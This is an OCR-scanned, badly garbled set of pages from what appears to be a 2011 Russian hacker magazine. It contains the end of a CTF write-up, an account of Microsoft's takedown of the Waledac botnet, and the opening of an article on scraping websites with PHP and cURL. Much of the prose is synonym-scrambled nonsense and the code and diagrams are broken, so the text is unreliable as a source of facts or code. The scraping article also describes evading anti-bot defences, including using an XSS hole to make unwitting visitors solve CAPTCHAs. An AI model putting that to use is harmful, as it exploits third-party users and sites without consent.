уязвимой форматной строкой. Втораяпроверка со строкой <<х" lХРРТН@8 »

задним числом применения несложного кодирования [вх одная строчечка должна
бытовать <<xevgdirkhe»J, близ усnешности символ сбрасывается равно используется

fputs . Если ни та , ни дру гая проверки безвыгодный прошли, сцепление

утвердить неделю во готовно вместе с ти ко кибервойне . Впрочем , пользу кого того что­

обрывается. Собственно, нам нужно было покрыть расстояние особенно первую

бы поучаствовать на

пров ерку равным образом насчет экс плуатировать уязвимую форматную строку.

CTF, в некотором расстоянии путешествовать безграмотный надо: на Рос от ии вдобавок про­

водятся игры, из каждым годом набирающие во се значительнее равно хлеще
участнико в-

RuCTF, <<Сиб ъ Цтфъ >>, Leet Маге CTF, CITCTF да многие

другие. Тем, кто именно хо четное число испробовать приманка силы на навыке боевого
ха кинга на усище ловия х ограничен н ого времени да не без; возьми , нужно скоренько

собира ть команду да расписываться сверху ближайших со ревновани­

ях! Студентам, подумывающим в отношении работе на сфере информационной
безопасности, есть смысл вмещать во виду, почто многие ИБ-компании подина ­
бирают сотрудников на персонал лично возьми подобны х контестах. А такую

Ход решения: В так миг в качестве кого одна доля команды ночным делом пыхтела

надо hiveг" ом, вторая порция исследовала дампы трафика равным образом искала
успешные атаки возьми наши сервисы. Ребята поработали ужас хорошо,

объединив сделано имеющиеся зна ния по отношению сервисе, не без; <<успе шными » атаками,
проведенными нашими конкурентами получай сверху с, равным образом получили требующийся
эксплоит. <<Ус пешными » во кавычках, оттого почто конкуренты весь в одинаковой степени малограмотный
получили наши х флагов- сработала наша хитрость защиты. Стратегия

около получи з ванием << атакуй меня, ради пишущий эти строки атаковал тебя » .

осуществимость воспрещается у п уска ть . :Х:

ХАКЕР

00/153/2011

057

~акз
Ботнеты

во а надстройка

В последнее миг по отношению ботнетах на рунете го­

ОПЫТ КРУПНЫХ

ворят аспидски много. В основном сие связано со

КОМПАНИЙ БОРЬБЫ С

ООоS-атаками возьми известные равным образом посещаемые
ресурсы. Однако первые прототипы современ­

ных ботнетов были обнаружены до сей времени на

КИБЕРПРЕСТУПНОСТЬЮ

0999 году.

ЧТО ТАКОЕ БОТНЕТ?
Ботнетпредставляетсобойсовокупностьсистем,зараженных
вредоносным ко д ом равно у правляемы х централизованно . Причем устро­
ен спирт таким образом, сколько уничтоже ние или — или устранение порядочно

большого количества узлов безвыгодный подобает сказываться бери его работоспособ­
ность во целом. Ботнеты могут прилагаться на та ких цел ей, на правах

""
"1

рассылание спама, фишинг,

,, 0

DDoS, атаки бери отдельные люди системы, влияние

н овых ПК равным образом претворение их на узлы ботнета. Стоит отметить, аюшки? во

"1

"1

0

отваленный время промышленность киберпреступности порядком си льно

0

сегментирована соответственно специализации да направленности пре сту пл е ний .
Это означает, аюшки? первый попавшийся занимается своим делом. В результате

0
0

получается, в чем дело? созда т е ль Ботнета прода е т запас иначе говоря сервис

" ....

Ботнета другим злоумы шл ен никам , от пециализир ую щимся н а т ех либо

иных видах преступлений [типовую бизнес-структуру твоя милость можешь

0

0

сообразно смо тр еть в иллюстрации). Стоит отметить, зачем интерфейс у прав­

"

"

Фt~wинг

.

ления ботнетом д оволь хотя для ст. С ним можетсправиться человек,
обла дающий пусть даже жуть низкой квалификацией. В соответствии вместе с

-

облачными веяниями, на посл е днее пора появила сьуслуга Malwaгe

as а Seгvice. Е сли один человек никак не может основать равно пропагандировать близкий

Вз.nо равно щик
AT<IIC.ИMa
сераеры

зловре дный код, спокон века найдет ся сильнее искусный провайд ер та ких
услуг, восприимчивый из д елать сие вслед за определенные д е ньги. Впрочем,

разбудить ботнет этого дня в свою очередь безграмотный Царь славы уведомление какая сложная задача. На
Поnытки заражения новых комnьютеров fмодов\

рынке кушать бездна готовых наборовдля изготовления ботне-

та, таки х в духе Zbot [Zeus), Spyeye, Maгiposa, Black Епегg у, ButteгFiy,
Схема использования ботнета

058

Reptile. Это означает, почто современ ны е владельцы ботнетов могут

ХАКЕР

00 /153/2011

ажно никак не иметь отличительной особенностью какими-либо особыми технологическими навы­

крупнейших ботнетов. Звучитгром ко?

ками . Впрочем, неравно бросать что касается крупных ботнетах, так их создатели­

01\/l•..,.•тn.""~"""" такие ботнеты, как:

ii80%мировогоспама.

это, безусловно, способные, талантливые люди, биться не без; которыми
хватит сложно. В рамках сего материала ваш покорнейший слуга хотел бы раструбить об

служил инструментом чтобы финансовых пре­

принесшихболее$100млнубытков.

практиках, которые используются большими компаниями пользу кого борьбы
от киберпреступностью и, во частности, ботнетами. Речь, на частности,

пойдет об активности компании Microsoft, на которой моя особа м работаю.

w,.,.,.n,.r.боты которого отправляли

0,5 млрд спам-сообщений

жедневно. В судебное дело е его исследования было найдено пол­
миллиона nа ролей ото почтовых ящиков пользователей равно FТР ­

MICROSOFTVS. БОТНЕТ
Возможно, сие да заставит кого-то улыбнуться, же на

серверов.

Microsoft во по­

ИЕПРАКТИКИ

следние нескольколетнаблюдается серьезная служба объединение повышению
безопасности продуктов равным образом сервисов . Появились равным образом стали употребляться

Длятого ради nонять типовые способы уничтожения ботнета, следует

методологии разработки безопасного заключение SDL, который ключевым образом

разобраться не без; его архитектурой равным образом слабыми местами. Чаще всегодля

повлиялонаколичествонайденныхзапоследнеевремяуязвимостей

управленияботнетомиспользуетсяодинилинесколькокомандных

[особенно тех, которые позволено эксплуатировать). Но речьсегодня пой­

[часто центральных) серверов , называемых Command & Control, либо

дет отнюдь не насчёт превентивных мерах, которые могут предупредить будущие

С&С.Онивзаимодействуютсконечнымиузламиботнетаnоразным

угрозы, а что касается борьбе не без; геморрой ми, которые актуальны сегодня. Большое

nротоколам.Наиболеечастовкачествеnротоколауnравленияис ­

численность зараженных машин -как разтакая проблема.

nользуетсяiRС.Впрочем,впоследнеевремярезкоувеличилосьпри­

Внутри компании был создан общий колонна подразделений по части борьбе вместе с
киберпреступлениями. Последние носят неодинаковые имена- Digital

менение Р2Р-протоколов в духе побольше устойчивой, добро бы равным образом технологич ески

Crime
Unit, Microsoft Security Response Center, Microsoft Malware Protection
Center,Trustworth Computing, -но задачи каждоготак или — или иным способом

сложной альтернативы. Интересной экзотикой во последнее вр емя

пересекаютсясnроблемойкиберnрестуnности.Вместесправоохрани­

Facebook. Так либо иначе, пользу кого борьбы из ботнетом дозволено учинить

тельными органами да исследовательскими организациями

небольшую толику конкретных дей от твий :

Microsoft

сталоиспользованиедляуправленияботнетафайлообменныхсетей
равно перенесение управляющих команд во теле фотографий, публикуемы х возьми

С&С- вместе с ерв е р

С&С-сер на ер

С п аиеры

Рассыnка
сnама

Судебное вердикт nо ­
Заражение
новых машин

зволило задержать

действиедоме нов , ис­

nользуемых ботнетом

Закрытие ботнетов энергично сократило сумма мирового спама

ХАКЕР

00 / 053/2011

059

взламывание

Захватить иначе следовательно с строя С& С-узлы .

DDoS нате С&С-узлы.

НЕ ТАКИЕ, КАК ВСЕ

Жалобы провайдеру, идеже хостятся С&С-узлы.
Захват DNS-имен, используемых С&С.
БлокированиеiРадресов.

Арествладельцаботнета.

Опрометчиво считать, который Ботнеты состояттолько с Windows -машин .

Естьботнеты равным образом держи Linux/Unix-PsybOt, Chuck Noггis, насчитывающие сот­

Судебный иск.

нитысяч устройств. В основномтакие Ботнеты создаются изо домашних
К сожалению, далеко не всё-таки изо сих способов эффективны, а другие равным образом
совершенно незаконны . Междутем другие с них нам успешно посчастливилось

маршрутизаторов, коммутаторов равно NAS нижнего ценового диапазона.
Уничтожитьтакой ботнеткрайне трудно, таккакдомашний ламер

применить. Так, Ботнеты Rustock равным образом Coгeflood были уничтожены доволь­

во большинстве случаев безвыгодный обладаетзнаниями на Linux равным образом навыками обнов­

только тривиально. Это посчастливилось совершить от помощю захвата С& С-серверов

ления прошивки устройства. Производитель устройства заинтересован во

правоохранительными органами до решению суда. Затем правитель­

быстром устареванииустройства равно то и дело никак не всего-навсего малограмотный намеренустранять

ство СШАдало правоохранительным органам решение из через

недостатки,ноинеимеетмеханизмовцентрализованногообновления

командного интерфейса ботнет а отправить командуудаления заключение

своих продуктов. Поданным исследования от2009 года, на интернете на

малвари со зараженных машин. Работа сообразно закрытию другого ботнета­

все в одинаковой мере кто час позволено обнаружить до некоторой степени миллионовдомашнихустройств вместе с

Wаlеdас-оказалась вновь больше интересной, равно для этом моменте моя особа хотел

устаревшимиnрошивкамиипаролямипоумолчанию.

бы встать подробнее .

WALEDAC: УСТРОЙСТВО
Сложность борьбы со

Waledac заключалась во децентрализованной схе­

~

ме работы ботнета. Для его работы было зарезервировано ни беда сколько ни
было зараз у разных провайдеров хостинга. Кроме того , интересах
управления ботнетом успешно использовался Р2Р-механизм. Если

отнестись в схему ботнета , так мгновенно бросается во ставни бесчисленно со лой­
ность управляющих серверов. В процессе заражения системы от по­

мощью Waledac озлобленный шифр определяет, какую значимость короче выпол­

cnм:co~t.

.. coce,ael,.

ш.а.о~~ ходо.ь:.Ш.о

CnмcoK .. COCiдeiJoo

O.c;.IO.O.O.d;JO.O.O.e; li
O.O.O.J:1Q.O.O.c;.10.0.0

t"l..lA..u,J!l.lA.x.d:

~1- 068.;t.a;J,2. 0bl.ll.b
~,2". 0il".. .... ,1,:l.lbl.!i.t
l 02. 061.s..&:191.1""--.llt
092".16&.&.t-xgl.161.1.f;

.h:IOO.OH;J,O.O.();joJ:OI
O.O.k;lO.OCk~JO!O.O.m
.IO.O.«U;J:O.O. O..o; .Ш.

O.O".p~O.O:OI IU}O.O.O.I

092: 0М...IIr; l!2. 061..-.t

; .IO.O..O"...t:JO.O. йt

l,l.J6a.amrJ92. f6LLA:
JЭ~ 068lJI..o~1.16Ь-o~

нять новомодный узел. Он становится либо простым узлом, рассылающим
вместе с шаг м, разве находится из-за

Зараженныйуэел

...
~aledac (nоеторитеnьl

-

чуть-чуть 077 дом.енных имен. Это значит, ась? завладевать сервера нужно

0"9l. J68:.a-4, 0Эl .J61,a_r.
0911~;.192.168..a.l

NAT равно безграмотный принимает входящие соединения получи

00 й порт, либо узлом, какой-никакой повторяет !ретранслирует! команды с
центра , -то вкушать своего рода репитером. Репитеры используются про
управления ботнетом. Каждый репитер сверх того передачи у правляю­
щих команд узлам-спамерам поддерживаеттакже опись « соседей>>,

пребывающий изо 000узлов, и выполняющих предназначение ретранслятора,
ко которым симпатия может приспособиться до Р2Р протоколу. Со временем

кому всего-навсего не лень узел-повторитель регистрирует свое доменное отчество во fast flux

DNS. Это делается интересах того, чтоб передать реальность управляться ко

Каждый репитер поддерживает каталог «соседей»

Сnмсок «сОСе,ааА,.

IOO:O.;,:IO.O.O.b; IO.Ol
0.~10. 0.0

d:I.O.O,O.r,JI

o.o.o.~to..o.o..,;1o.o. o

.h:IO.O.O.I:.IO.O.CNf:_lOt
О" O.II.;JO.O.O.I;lO.O.O."""
Cnмco lt .,COCeЩI.I"•

;IOO.G..n;JO.O.O.O".JOJ
ctO.r.JO.O.O.q.: 00.0.0..

0-"l.l&&Jr.~;Ul". IA.-..Ь.

;ro:o.o.s.:1o.o.a.r

0.91..168Jr.r..lt1.16&.л.d ,

Зараженный уэеn

~- ~~;Ul . IЫ.....I;

Waledac (nовторитель)

092". 06&ц:;l!l. ~
092.1А.ЦJ92

0:61.-.;.
...1,

0,2, 0 ~192 . 061

Главный С& С-сервер

Fast Flux
DNS-cepвep

0 0l. 061.1 ."".1"l. l~ n:.

Fast Flux

L!2. 06&JI.o;J,H6Lo..rr.
04}.1_161.x.-r.U1.16t.J...f:
091".1.........1,l. l&a...l

DNS-i:epeep

tt

Зараженный агрегат

Waledac (nовторитель)
.... Ко~мдw

" - -

-. в.._~•·
Промежуточный

/

/

nовтормте.nь

.

. . . Tpo~ф.м.naiJJOPimlll8il
. . . Fast Flux· DNS

регулятор

... Сn;r,м-~•к

ITSLI

Повторитель"
ЗараженныМ
установка

Waledat:

Уэеп-спамер

Многослойная архитектурауправлен равным образом ваш покорнейший слуга Wa ledac

060

Сервер

Microscft

Подключение серверов Microsoft для Waledac

ХАКЕР

00 / 053/2011

Как закрывают ботнеты

(J
Зараженный отделение

Waledac tn об еторитеnь}

Сnмсок *
O.O.O..a;.lOtO.O.Ь;tD.D

l.<;:;lO.OJO.d~·10.0IO.e;1

Реrмстрацмя на

I :O.O.f;l.OJ0.:0&;10.0:0
.h;10,0:0.t; J.0.0.0.j;:t·o.

DNS

O.CJ~.10.0iCЦ"1DJO.Om"1

,;t0.0.0.n;1040.o;4.0.

O.O,p;i1011U1Jq;I0.0.01
.:10AD.t.::1D.D.O.t
.С О М D NS-cepвep

За р ажениый связка

Waledac

(n ов торител ь)

Регистрация дворец е н н что касается г касательно равно мен да

Ста ндартный n од х од ко у nр авлению б отнет касательно м

себя узлам-спамерам, кабы очередной для ним репитер сразу выйдет

проц е дуры ICANN наша сестра воепользавались проц е дурой TRO ltemporary

с строя равно довольно недоступен. Таким образом узлы ботнетавсегда

restraiпiпg огdег]- вот змож ностью на срок приостанавливатьдей­

могут сыскать следующий узел-ретранслятор да доставать с него

ст вие доменов возьми 08 дн ей . На этом этапе пока что одной сложностью было

коман ды равно обновления исполняемого заключение . Со временем роли узлов

то, ась? порцион DNS -имен была зарегистрирована натерритарии Китая равным образом

могут меняться. Е не без; ли система, используемая по образу повторитель , для

Нидерландов . Поводом ради судебного иска было нарушениеторговой

примеру, попадает во корпоративную обмет равно лишается внутренние резервы

марки Microsoft равно Pfizer. Ботнет по полной обойме рассылал корреспонденция от уведом ­

допускать подключения получи 00-й порт, в таком случае симпатия машинально полу­

лениями об выигрышевн есу ществ ую щей лотерее Microsoft равным образом рекламу

чает предназначение не без; движение мера. При этомпроанализировать топологию ботнета

подде льныхлекарств почти маркой Pfizer.

безвыгодный беспричинно п роста, вследствие этого на правах до этого времени одной из-за дачей репитера является

Для того воеже злоумышленники могли одержать верх ся из Mi cro soft на

воздействие исследованиютопологии ботнета. Он служит

судилище е, еже ли у них появится но лани е следовать обнаружить близкие полномочия сверху ботик н ет, н а

своеоб разным барыш си равным образом безвыгодный позволяетузлам-спамерам узнавать что­

сайте было опубликовано исковое заявление. Также во националь­

либо об у правляющих узлах С&С.

ны х газетах возьми терри т ории вместе с тран, каким ветром занесло подозреваемые управляли

ботнетом, были опуб вид что касается ваны у ведомления в рассуждении ваша сестра зо на е на суд. Как равно

WALEDAC: УНИЧТОЖЕНИЯ

предполагало со ь, последняя стержень в колеснице невыгодный посм е л предстать во ареопаг равно декларировать в отношении своих

Проанализировав архитектуру ботнета, пишущий сии строки проработали горизонтальная проекция к

компетенция х в ботнет. Таким об дружно Mic ro soft выиграл судилище возьми территории

атаки нате ботнет со следую щими конкретными шагами :

США , Китая равным образом Нид ерла нд ов. Подробнее в отношении юридическихтонкостях равным образом

0. Наруш ен ие р2р-механизма обмена управляющими командами.
0. Нарушение обмена DNS/НТТР-командами .
0. Нар у шение работы двух верхних от лоев С&С-серверов .

сайта Microsoft I Ьit. l y/riDUDA ] .

перипетия х борьбы следовать ботнет не запрещается придавать значение чему во специальном разделе

В результате эт равно х юридическихдействий власть получай DNS п ереш ли
ко Microsoft. На известный м оме нт DNS-имена подключены для серверам

Первым делом нужно было перервать работу Р2Р-механизма . В

Micr osoft. В вместе с л у ч ае, yes ли для э тим се рверам подключается инфицированный

рычаги от тем, ась? назначение нахождения ближайшего ретранслятора

узе л с ботнета, получай него подается килоом анда, прика зываю щая боту

в утробе лодка блистает своим отсутствием а ра ботала н естаб ильно , была возможна ситуация, что-нибудь

бездействовать. К сожалению,

узлу приходилось перерыть прежде 00 адресов, держи хо дящихся на е г об от писке

вр е поклепный шифр бота Waledac, потому наш брат связываемся вместе с провай­

Microsoft безвыгодный имеет полномочия уничтожить

« сосе дей >>, с тем обнаружить корпящий ближайший репитер . Благодаря

дер ами, после котор ы х абонент около клю чен для Сети равно ради сименс их

этому нам посчастливилось сложить поддельные репитеры, сделать смешанный частью да х на со­

помо чь пользов ате лю стряхнуть с вр е д оносно г по части стих со п в отношении мощью

став ботнета равным образом сынициировать расширять фальшивые обновления списка

искуситель п латных утилит, таких на правах Microsoft Secur it y E sse пtia l равным образом Maliciou s

репитеров, тем самым нар ушив связность системы управления Р2Р.

Software Remo val To ol .

Этопозволилопередаватькомандыузлам-спамерамотспециально

соз данных командных серверов Mi crosoft.
В случае н ерабо тоспособности Р2Р-механизма узлы ботнет а

АКЛЮЧЕНИ
Мы надеемся та ки м образом в соответствии с сте п е нн в рассуждении очиститьинтернетот по­

начинают искатьдруг друга со через механизма fast flux DNS.

из ледни х остатков ботнет а Waldac. Чтобы з л оумышлен никам было

Поэтому надо было разбить равно этотспособ управления, дабы

неповадно во дальнейш ем строить ботнеты,

з лоумышленник далеко не был в состоянии реконструировать сличение надо ботнетом. Это

честве со прав оохра нит ельн ыми органами продолжает расследо­

занимательный момент, потомучто в этом месте я использовали адвокатский

вани е равным образом сбо р судоремонтный завод аза т е ль со тв . С этой ц е лью да мы не без; тобой пр едложи ли награду

механизм. Типичная акция отзыва DNS имени чрез ICANN из по­

на $250 000 тому, который сообщи т сведения, вместе с объединение собс твующие аресту

мощью процедуры со страшным названием « Uпiform Domaiп-Name

пре из т у пной гр у ппы , стояв ш ей следовать Ru sto ck I Ьit. l y/oR7x88 ] . По на­

Micro so ft во сотрудни­

Dispute-Resolutioп Policy>> можетзанятьдовольно бездна времени . Это

шему опы т у, таковой подина процессия может из работ ать. В заве ршение хоче тся

позволило бы з лоум ышл енникам ждать осознать, в чем дело? равно х атакуют,

сказать, что такое? Microsoft равным образом во дальнейш ем намерен по полной обойме враждовать

равным образом заняться распоряжения по части регистрации новых DNS-имен, держи которые

не без; киберпреступлениями, пре не без; ледуя злоумышленников вс ем равно до­

позжеперевестиуправлениеботнетом . Поэтомувместостандартной

ступными ему способами. :Х:

ХАКЕ Р

0О /153/2011

061

qbz [caydlayandex. rul

blt.lv/qV15Z8мaнyaл по части настройкам

cURL.
blЦy/oMBm cWплаrин

ИНГ

LiveHПPHeadersдnя

Mozilla Firefox"a.

ДОБЫВАЕМ ЦЕННУЮ

ИНФОРМАЦИЮ С ЧУЖИХ САЙТОВ

Автоматический собрание информа­

0

редположим,переднамистоитзадачапроанализировать

0

леодр страниц одного сайта да скопить от них какую-то

ции не без; чужих сайтов на больших
объемах-задача простая толь­

На наwем дискеты
найдешь видео, под­
робноописывающее

ко бери стержневой зырк . Сегодня пишущий эти строки

процесспарсии га

из криптам , какой-никакой будетходить по мнению из айту, проверять контент равно вам ­

сервиса slil.ru.

поделюсь не без; тобой конкретным

дирать оттедова нужные данные.

Однак в рассуждении возьми дел е на сё отнюдь не что-то около nро не без; ведь : любые сервисы безграмотный заинтере от ова­

Такженадиск автор сих строк

опытом за созданию грабберов

по-хозяйски выложили
до этого времени необходимые

чтобы удаленных ресурсов держи при­

скрипты равным образом быть мероприятия .

САР Т СНА;

авторизацию lcookie, сессии !;
НТМL-код, что

да мы от тобой поnучаем со slil.ru

сертификаты;

Jа v аSсгiрt-защит у ;
норма соединений;

"- m- -

ге нерацию ключей доступа чер е з

flash;

другие, больше изощренные от пособы защиты .

< acr 0p~ c;~ ··~ ext /j avaacr1pt ">

" """ 0Jrt ld!>ld .

него воровали информацию , загружали сервераненужным трафиком
равным образом всецело игнорировали рекламу. Поэтому весь кру пны е сервисы

mamba.гu равно slil.гu .

l l ~:.P" / "e "7 S!II 0 0/

ны во том, с тем вместе с равно х вместе с истемами работали боты . Никто малограмотный х оч ет, дай тебе у

активноборют не без; ясботами,испольэуяраз н ообразные технологии :

мере во всем известных сервисов

v• r

ко н кретную информацию : избить ссылки, телефоны, имена
равно эдак дал е е. Вроде в качестве кого дельце беда простая равным образом решается несложным

0 e2~a 0211 /Ь.c.lnlarcl . " РО" 0

</ a e-r :~.pt >
<t.Ьla

Miq!"!t• "100"" w1clt!"l• "l00""

011- ~r:c;i">

ha1qht•"2S"Xtd></t4></~:r>

<tr

<tr><tl1 ha1Qht• "100" ali;n• "center•
<P>Cnt. o:м6o асен,

Впрочем , на со е используемые те х нологии- сие безвыгодный полное расшивка

valЦ~:. • "alcSdla">

кт в рассуждении nots::o "aaт paJaи8&":t. расурс . </р>

проблемы, а всеголишь фигурация процедуры: обогнать присутствие граббинге

</td></CI">
<tr><td v&11qD• "ru.dCI.la">

не возбраняется ни чуточки на сё.

aliqll.• "" cantar">
j iJ9" nD 0P 0 "nЬap s "сЬарs 0 !>4!1 <Ь:к:><Ь::: >

Ь•сЬа rcl .
</р>

&11qn•"oencax">

~ака<tка

<•

taA.IIa

м а .. наrс~r

<t81""11 00

саку11J1,

кт.и

aocn0JIIIa)"Й78Cio

<8:1=&11

ПРАКТИКА

:Ld.• ~link_pllc:e"></.tpan><l:lr>

hж•t • "/pa;•IU.u.t•7id. "" 0l4~!jj8l">noaaJ1:oa•т•c:• 011 фаА/1 .</а>

Как г оворится, отличается как небо через земли безраздельно однова увидеть, нежели сто единовременно услы ш ать. П оэтому
подле вместе с тупим для практич еской ча от ти , во которой пишущий сии строки н а п равным образом ш ем бесхитростный пар­

v•r H nk- " / S81.5e jje l/ 011:t6d.5 l d.. i •2b•i2*" t o r.,.rd . pn; • J
do.cшмtnt . g• t t:liC8 Dt !lyi cl(" l~ nll:_plac:e •

0 . ~::nerHIИI.•" < • h:•t•" " .. l ln k ... . "

o nc:l:l. c:k-"dl_ fl• O"> c:aФKQЙ</ a>";

сер с целью удобного Файлаобменника slil . г u .
Выбор п ал держи него , эдак на правах ни для аки х особых защит во еб-сервер сего

l l t 0"1- 0U t ( t U:IC:t:I.011() (
0!(41 f l •• l)
cloc:шЙn t . l oc:atlon . l"::lt"• l l nkJ

),

ре вместе с ур со а н е ставит, а лично дьявол включает бездна интересной информации ,

ЫI О О) ;

ёбаный как бы загруженные аккаунты, кулуарный софти отдельные люди забавно ­

</ •c::l.pt >

вместе с ти . Рассмотрим ан от тр у ментарий , каковой да мы из тобой будем проэксплуатировать через

</Р>

альфа и омега напи из ания бота равно по первы х полученных результатов:
Браузер.

<tЖ>

РНР.

<tcl> ,nЬ•p J </td.>

<tcl wiclth• "i00">
</td.>
<td>,nbiP t </td>
</tr>

062

...

cURL.
Плагин Li vе НТТРН еаdегsдля

Mozil la F i гe fox .

ХАКЕР

00 / 053/2011

Парсингпо-крупному

Больше нам ничто безграмотный потребуется, исключая головы получи плечах да удоб­

ного тек из т ово го редактора. Для основания ну-ка определимся, что такое? а я

r I! Vt_" 0111р lн·.нJ("f-.

GJLQj ~

ttaders Gmtrator Config AЬout

будем п арси ть . П арси ть будем этноним файла, его разм ер равно ссылку с целью
скачива ния . Вся каста данные содержится во НТМL-сорцах страницы

Accept: iniQt{png, ·r;Q-o.s

скачи вания загруженного файла.

АссерН~ : en"US,ei.;q-o.s
A~t-Enc.odino: gztp,deflatt
~t<har~t: IS0-88S9·1,utf-8;q.O. 0, •;q-o. 0

Теперь рассмотрим способы настил уче ния стих праздник самой от траницы .
Их в свой черед несколько:

0.

........... ,))!)

Стандартная связка file _ get_coпtents[). Требует включенн ую

...,.,.,"._...,.

с.,

Refe<"" ht1;>"1/www.i<q.<Om-.ЬO•fenldeot""t1p"/fwww . i<q.<Om/

РНР - директив у allow_ uгl_fopen . Включить ее дозволяется посредством

. htaccess-фaйл настройки сервера Apache [php_flag allow_uгl_
fopen on). Здесьтакже нелишне у помян уть, что такое? на пятой версии
всеми любимого РНР следовательно возможным соз выкидывать определенные

настройки для того НТТР- вслед проса . Это реализуется примернота для :

Н1ТР/1 . х

000 ОК

O.,tt: Fn, Z2 )J 001121:56:00GМf
Content-Length: 05

no<ac:he
fxs*es: \Yed, 09 Apt 0000 01:43:00 GМТ

Pragrм:

last-мodifled:

Wed, 01 kn 0001 09:51:30 GМТ

eontont""""" ""-IФ
~<ontJol:

_$_~e"tt:Шg~=.. a.c.r;;J ~(."J:tj;j;p_:_~y_(" method"

=> "GET", "heade_r "=>
____::_u_ser_::Ageдt; [ЮЗЕРАГЕНТ)",[.Iш_,
" ·- - - - "Accept : text /x ml, application/x ml,application/
xhtml+xml;q=0. 0\ r \ n" .
"Accept-Language: en-us,en;q=0.5\ r \ n".
"Accept-Encoding: gzip,Q_eflat e\r \ n".
"Accept:_chars et;J$0-!182~bl, utf:.S; q=0. 0,:"; q=0. 0_":));__ _
$settings=str.eam_context_create($settings); _ __
$html=file_get_contents(" http://url.tld/" , NULL, $settings);

prtvatt, no-acht,

no~·~t<ocЖie, proxy<f~.11dote

Server: GFf/2.0

Плаrин LiveHПPHeaders

Идеальная вещьдля работы не без; удал е нны ми серверами. Это наравне
гельветический нождля соста вления запросов получи сервер. Всё продумано
д насчёт мелочей равным образом обернуто на нутром понятн ую среду разработки. На

0. Со кеты [fsockopen[) равно некоторые функции, которые да мы вместе с тобой ра ссма тривать
безграмотный будем).

курле автор сих строк да остановимся, что-то около на правах всего лишь дьявол может отвести нам

многопоточность работы равным образом треб уемую быстроту [в среднем
четверка раза быстрее

0. cURL.

cURL на

file_get_contents).

КАК СЕРВИСЫ ЗАЩИЩАЮТСЯ ОТ ГРАББИНГА, И КАК ЭТО ОБХОДЯТ
САРТСНА

Авторизация

Сертификаты равно

Лимитсоединений

Существуют no крайней

Оч е нь не раз бываеттак, аюшки?

JаvаSсгiрt-эащиты

Для защиты через граббинга

меретрисnособа пользу кого

нео бходимаяи нформация

Ресурс, из которого твоя милость

грамотные админи­

обхода во всем надоевших картинок со

дост у nнатоль ко дляз аре ги стриро­

хочешь вырывать ан фу, может заниматься

стра торы ставя тограничения возьми

мутными цифрами /бук вами .

ванны х польэователейоnределен -

путем SSL, да на этом случае, даже если не­

ско ро не без; тьзакачиваниястрани-

Скриnтнаосновенейросетии

н ого ресурса. Она можетнаходиться на

обхо димы й сертифи кату тебя есть, далеко не

цы п ользо ват елем, а и нате

други х алгоритмов. Эффектив­

какой-либозакрытой частисайтаили

составляетбольшоготруда посоветовать

доля соединений равным образом частоту

а ст ь не без; пособ аможет интрузия хотя

а исчезать nодтак получи зываемым

скриnтис п ользов ать настоящий сертиф равно кат.

активности. Понятно , что-то ни единовластно

меняться, во случаекачественной

буза дворец бери форуме . Также изумительный многих

Для РНРя могуnосоветоватьзаме­

нормальныйпользовательнерабо­

капчи эффектив ностьавтома ти ­

случаяхдля регистрации тебе может

чательнуюбиблиотекусURL, которая

таетссайтомнесколькочасовпод­

ческогорасnознавания оnустится

nонадобить сяс nециальноеnригла­

любо-дорого р еа лиз условные единицы т всегда ради дачи , свя­

ряд,выкачивая5000страницвчас.

ниже5 %.

шени е -- равно нв а йт с ранее состоя вши хся

вслед за нные от сетевым взаимодействием.

По этом у, анализируя инициативность

Сервисы ручного ра со nо зна ва-

чл енов сайта. Только nосле nро­

Что касается JаvаSсгiрt-за щит, ведь

клиентов, умные системы равно

ния ка nчей не без; удобным АРiдля

хож дения nроце сса реги стра ции возьми

они чаще всегоориентированы получай

могут выявлятьлевыхпользовате­

автоматической работы . Здесь

ресурсе твоя милость сможешьполучитьдостуn

шифровка ис ходного стих [читай

лей да удерживать их работу. В в таком случае

кресловина тин ки разгадывают реальные

ко н ужному разделу. Данная следовать щита

статью << JavaScгipt : Игры на nрятки »

а момент администраторы далеко не могут

человечество на возлюбленный лайн-режим е, nо этом у

безграмотный nр е дставля етбольш ой невзгоды

изо прошлого номера) либо — либо нате nров ерку

действоватьвлоб:ведьпододним

эффективностьсnособаочень

во обходе, скорее, н ем ного замедляет

сnециальныхjs-nеременных , которые

IР-адресом вnолне могут находиться

высокая : давно

работу нашего бота, равным образом в таком случае километров неграмотный

доказывают, почто со тр ани ц а загружена

из присест усотни особа .

минус--заисnользованиеэтих

спокон века . Е сли наша сестра хотим пров одить

р еальн ым спринклер ром, а малограмотный ботом.

сервисовнужноплатитьденьги.

множестводей ствий сверху нужном сайте

Обходятс пишущий эти строки сии методы элементарным

зао днуминутуполучить1000

00% . Единственный

CMS

Что а делать, разве нам нужно

И сnо льзов ани е ХSS-уязвимостей

из-nод одного авторизован ног касательно а ко ка­

анализом НТМL-кода стра ницы . Такой

стра книзу , а сервер далеко не реагируетуже

дляnодсовываниякаnчейреаль ­

у нта , так нам сле дуетсо ставитьо дин

разбирательство твоя милость быстро сможешь выnол -

nосле 00 -й страницы? Исnользо­

ным nользователям. При nомощи

доnолнительный заnрос ко серверу во

жилка со nомощью инструмента О ре га

вать

ХSSнауязвимомсервисеможно

самом начале работы бота . Данный

DгagonF iyв <<О пере >> не в таком случае — не то nлагинадля

случае действие бота достаточно происхо­
дить далеко не вместе с одного IР-адреса, а напри­

socks- да

ргоху-сервера . В этом

разместитьспециальный ск рип~

просьба необ ходим ради получения ав­

<< Ли сы» Li veH TTPH eadeгs. Обе сих

каковой будетблокировать

торизационны х кукисов. Чаще всего делов

тул з ы nомогу ттебе nонять, какие но

мер, со

интерфейс да nредлагать nользо­

сие то есть сооkiе-заnиси, равным образом ни плошки

POST-, GET- равно СООКIЕ-переменные

сметка ножив

вателю диагностировать каnчу.Люди

паче . Посл е n олучения nеченек через

твой браузер в соответствии с сы л аетудал ен н ому

заn ро сов, держи которые сервер аккуратно

сейчаснауровнерефлексагото­

сервера nосл е дую щие заn росы будут

р есурсу. Затем твоя милость сможешь втереть

повинен ответить.

ваша сестра для таковой ситуации равно вместе с удоволь­

nрои схо дить этих исnользованием,

сии переменные во кодсвоего бота.

ствиемраспознаютподдельные

нежели пишущий сии строки да обходимданную защиту.

000 IР - адресов. Тем самым,
000 возьми 00, наш брат nолучим 0000

картинки, неграмотный чуя подвоха.

ХАКЕР

00 / 053/ 0011

063

хакинг

$_curl=curl_init();
$head=array{_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __
__"_tlost: slil . ru", _ _ _ _ __
"User-Agent: (ЮЗЕРАГЕНТ] ",
"Accept: text/xml,application/xml,application/xhtml+xml;q=e.s·,
